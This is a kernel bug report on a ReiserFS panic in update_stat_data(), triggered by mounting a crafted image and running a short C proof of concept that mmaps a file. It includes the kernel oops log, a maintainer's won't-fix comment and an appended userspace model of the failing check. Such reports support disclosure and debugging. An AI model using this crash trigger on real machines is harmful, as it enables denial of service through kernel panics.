Bug 200361 - Kernel panic in update_stat_data() when accessing a file on a reiserfs filesystem
Status: NEW
Alias: None
Product: File System
Classification: Unclassified
Component: ReiserFS
Hardware: All Linux
Importance: P1 normal
Assignee: ReiserFS developers team
Reported: 2018-06-28 21:06 UTC by Wen Xu
Modified: 2018-07-18 21:17 UTC
Kernel Version: 4.18
Regression: No


Attachments
The (compressed) crafted image which causes crash (67.50 KB, application/zip), 2018-06-28 21:06 UTC, Wen Xu

Description Wen Xu 2018-06-28 21:06:08 UTC
Created attachment 277015
The (compressed) crafted image which causes crash

- Reproduce 
# mkdir mnt
# mount -t reiserfs -o acl,user_xattr 31.img mnt
# gcc -o poc poc.c
# ./poc ./mnt

- POC (poc.c)
    #define _GNU_SOURCE          /* for asprintf() */
    #include <sys/mman.h>
    #include <sys/stat.h>
    #include <sys/types.h>
    #include <fcntl.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>

    /* Open the file on the mounted image and map one page of it. The mmap()
     * path updates atime, which reaches update_stat_data() and panics. */
    static void activity(const char *mpoint) {
      char *foo_bar_baz;

      if (asprintf(&foo_bar_baz, "%s/foo/bar/baz", mpoint) < 0) {
        perror("asprintf");
        return;
      }

      int fd = open(foo_bar_baz, O_RDONLY);
      if (fd >= 0) {
        void *mem = mmap(NULL, 4096, PROT_READ, MAP_PRIVATE | MAP_POPULATE, fd, 0);
        if (mem != MAP_FAILED)
          munmap(mem, 4096);
        close(fd);
      } else {
        perror("open");
      }
      free(foo_bar_baz);
    }

    int main(int argc, char *argv[]) {
      if (argc != 2) {
        fprintf(stderr, "usage: %s <mountpoint>\n", argv[0]);
        return 1;
      }
      activity(argv[1]);
      return 0;
    }

- Kernel message
[  949.720812] REISERFS (device loop0): found reiserfs format "3.6" with standard journal
[  949.720899] REISERFS (device loop0): using ordered data mode
[  949.720905] reiserfs: using flush barriers
[  949.724305] REISERFS (device loop0): journal params: device loop0, size 8192, journal first block 18, max trans len 1024, max batch 900, max commit age 30, max trans age 30
[  949.727088] REISERFS (device loop0): checking transaction log (loop0)
[  950.557910] REISERFS (device loop0): Using r5 hash to sort names
[  950.558231] REISERFS (device loop0): Created .reiserfs_priv - reserved for xattr storage.
[  967.052214] REISERFS panic (device loop0): vs-13065 update_stat_data: key [5 15 0x0 SD], found item *3.5*[5 15 0x0 IND], item_len 8, item_location 2972, free_space(entry_count) 0
[  967.052279] ------------[ cut here ]------------
[  967.052282] kernel BUG at fs/reiserfs/prints.c:369!
[  967.059616] invalid opcode: 0000 [#1] SMP KASAN PTI
[  967.060669] CPU: 0 PID: 1429 Comm: a.out Not tainted 4.18.0-rc1+ #8
[  967.061944] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  967.063902] RIP: 0010:__reiserfs_panic+0xe2/0x130
[  967.064864] Code: 48 89 da 48 c7 c1 20 11 94 a6 74 47 49 8d b4 24 d8 03 00 00 49 c7 c1 e0 21 9a a7 4d 89 e8 48 c7 c7 c0 12 94 a6 e8 62 a4 c7 ff <0f> 0b 48 85 db 48 89 de 48 c7 c2 20 11 94 a6 74 24 49 c7 c0 e0 21
[  967.068599] RSP: 0018:ffff8801efa77760 EFLAGS: 00010282
[  967.069671] RAX: 00000000000000a6 RBX: ffffffffa693af60 RCX: 0000000000000000
[  967.071092] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffffed003df4eee2
[  967.072513] RBP: ffff8801efa77810 R08: ffffed003edc4f21 R09: ffffed003edc4f21
[  967.073948] R10: 0000000000000001 R11: ffffed003edc4f20 R12: ffff8801ee98e600
[  967.075367] R13: ffffffffa693b980 R14: ffff8801cd360000 R15: ffff8801cd3601c8
[  967.076797] FS:  00007f88c4a10700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  967.078394] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  967.079537] CR2: 00007f88c44c1760 CR3: 00000001f136c000 CR4: 00000000000006f0
[  967.080980] Call Trace:
[  967.081504]  ? reiserfs_debug+0x10/0x10
[  967.082289]  reiserfs_update_sd_size+0x44f/0x590
[  967.083227]  ? make_le_item_head+0x130/0x130
[  967.084133]  ? mutex_unlock+0x22/0x40
[  967.084903]  ? do_journal_begin_r+0x46c/0x6d0
[  967.085789]  ? journal_begin+0x10f/0x1e0
[  967.086585]  reiserfs_dirty_inode+0x149/0x160
[  967.087465]  ? reiserfs_dirty_inode+0x149/0x160
[  967.088383]  ? reiserfs_unfreeze+0x70/0x70
[  967.089254]  ? timespec64_trunc+0x5c/0x90
[  967.090072]  ? timespec64_trunc+0x5c/0x90
[  967.090902]  __mark_inode_dirty+0x220/0x4f0
[  967.091754]  ? timespec64_trunc+0x90/0x90
[  967.092571]  generic_update_time+0xd7/0x170
[  967.093435]  touch_atime+0x164/0x190
[  967.094169]  ? __atime_needs_update+0x360/0x360
[  967.095101]  ? kasan_kmalloc+0xad/0xe0
[  967.095891]  generic_file_mmap+0x80/0x90
[  967.096702]  mmap_region+0x5dc/0x8d0
[  967.097449]  do_mmap+0x543/0x790
[  967.098126]  vm_mmap_pgoff+0x182/0x1f0
[  967.098896]  ? vma_is_stack_for_current+0x60/0x60
[  967.099852]  ? putname+0x80/0x90
[  967.100518]  ? __fget+0xbe/0x110
[  967.101202]  ksys_mmap_pgoff+0x2a9/0x3a0
[  967.102011]  ? find_mergeable_anon_vma+0x60/0x60
[  967.102964]  ? filp_open+0x60/0x60
[  967.103666]  ? vm_brk+0x20/0x20
[  967.104338]  __x64_sys_mmap+0x94/0xb0
[  967.105115]  do_syscall_64+0x78/0x170
[  967.105868]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  967.106903] RIP: 0033:0x7f88c452c6ba
[  967.107631] Code: 89 f5 41 54 49 89 fc 55 53 74 35 49 63 e8 48 63 da 4d 89 f9 49 89 e8 4d 63 d6 48 89 da 4c 89 ee 4c 89 e7 b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 56 5b 5d 41 5c 41 5d 41 5e 41 5f c3 0f 1f 00
[  967.111428] RSP: 002b:00007ffdc414efb8 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
[  967.112949] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007f88c452c6ba
[  967.114365] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
[  967.115783] RBP: 0000000000000003 R08: 0000000000000003 R09: 0000000000000000
[  967.117209] R10: 0000000000008002 R11: 0000000000000246 R12: 0000000000000000
[  967.118626] R13: 0000000000001000 R14: 0000000000008002 R15: 0000000000000000
[  967.120051] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd mac_hid i2c_piix4 soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too qxl drm_kms_helper crct10dif_pclmul syscopyarea sysfillrect sysimgblt fb_sys_fops ttm crc32_pclmul aesni_intel drm aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy
[  967.129773] ---[ end trace 2e85051acb5f6dc1 ]---

- Location
https://elixir.bootlin.com/linux/v4.18-rc1/source/fs/reiserfs/inode.c#L1434
	if (!is_statdata_le_ih(ih))
		reiserfs_panic(inode->i_sb, "vs-13065", "key %k, found item %h",
			       INODE_PKEY(inode), ih);

Reported by Wen Xu (wen.xu@gatech.edu) from SSLab at Gatech.
Comment 1 Jeff Mahoney 2018-07-18 21:17:20 UTC
This is a panic due to reiserfs not having real error handling.  As reiserfs is in maintenance mode, this class is not on anyone's roadmap for fixing.
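The check quoted under Location, and the missing error handling Comment 1 refers to, as an added userspace model that is not kernel code: it derives an item's type from its key the way reiserfs does for both the 3.5 and 3.6 key formats, and returns -EIO instead of panicking when the item found for a stat-data key is not stat data. The constant values follow fs/reiserfs/reiserfs.h; the struct layout, function names and the sample items for key [5 15 0x0] are assumptions and constructed data.

```c
/* Added model (not kernel code) of the item-type check behind reiserfs
 * message vs-13065.  Constant values follow fs/reiserfs/reiserfs.h; the
 * struct is a simplified stand-in and the sample items are constructed. */
#include <stdint.h>
#define KEY_FORMAT_3_5 0          /* ih_version values; the panic shows a 3.5 item head */
#define KEY_FORMAT_3_6 1
enum { TYPE_STAT_DATA = 0, TYPE_INDIRECT = 1, TYPE_DIRECT = 2, TYPE_DIRENTRY = 3, TYPE_ANY = 15 };
/* 3.5-format keys carry the item type in the "uniqueness" word of the key. */
#define V1_SD_UNIQUENESS       0x00000000u
#define V1_INDIRECT_UNIQUENESS 0xfffffffeu
#define V1_DIRECT_UNIQUENESS   0xffffffffu
#define V1_DIRENTRY_UNIQUENESS 500u
struct model_ih {                 /* simplified item head (assumption) */
    uint32_t dir_id, objectid;
    uint32_t uniqueness;          /* 3.5 keys: encodes the item type */
    uint64_t offset_v2;           /* 3.6 keys: type in the top 4 bits */
    uint16_t version;
};

static int uniqueness2type(uint32_t u) {
    switch (u) {
    case V1_SD_UNIQUENESS:       return TYPE_STAT_DATA;
    case V1_INDIRECT_UNIQUENESS: return TYPE_INDIRECT;
    case V1_DIRECT_UNIQUENESS:   return TYPE_DIRECT;
    case V1_DIRENTRY_UNIQUENESS: return TYPE_DIRENTRY;
    default:                     return TYPE_ANY;
    }
}

/* Item type as derived from the key, for either key format. */
static int ih_type(const struct model_ih *ih) {
    if (ih->version == KEY_FORMAT_3_5)
        return uniqueness2type(ih->uniqueness);
    unsigned t = (unsigned)(ih->offset_v2 >> 60);
    return t <= TYPE_DIRENTRY ? (int)t : TYPE_ANY;
}

/* inode.c:1434 panics if this item is not stat data; return -EIO (-5) instead. */
static int update_stat_data_checked(const struct model_ih *found) {
    return ih_type(found) == TYPE_STAT_DATA ? 0 : -5;
}

/* Constructed items for key [5 15 0x0], the key shown in the panic line. */
static int check_v1_item(uint32_t uniqueness) {
    struct model_ih ih = { 5, 15, uniqueness, 0, KEY_FORMAT_3_5 };
    return update_stat_data_checked(&ih);      /* IND uniqueness -> -5 */
}
static int check_v2_item(uint64_t offset_v2) {
    struct model_ih ih = { 5, 15, 0, offset_v2, KEY_FORMAT_3_6 };
    return update_stat_data_checked(&ih);
}
```

With the 3.5 indirect item from the panic line, check_v1_item(V1_INDIRECT_UNIQUENESS) returns -5 where the kernel calls reiserfs_panic(); a stat-data item returns 0.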
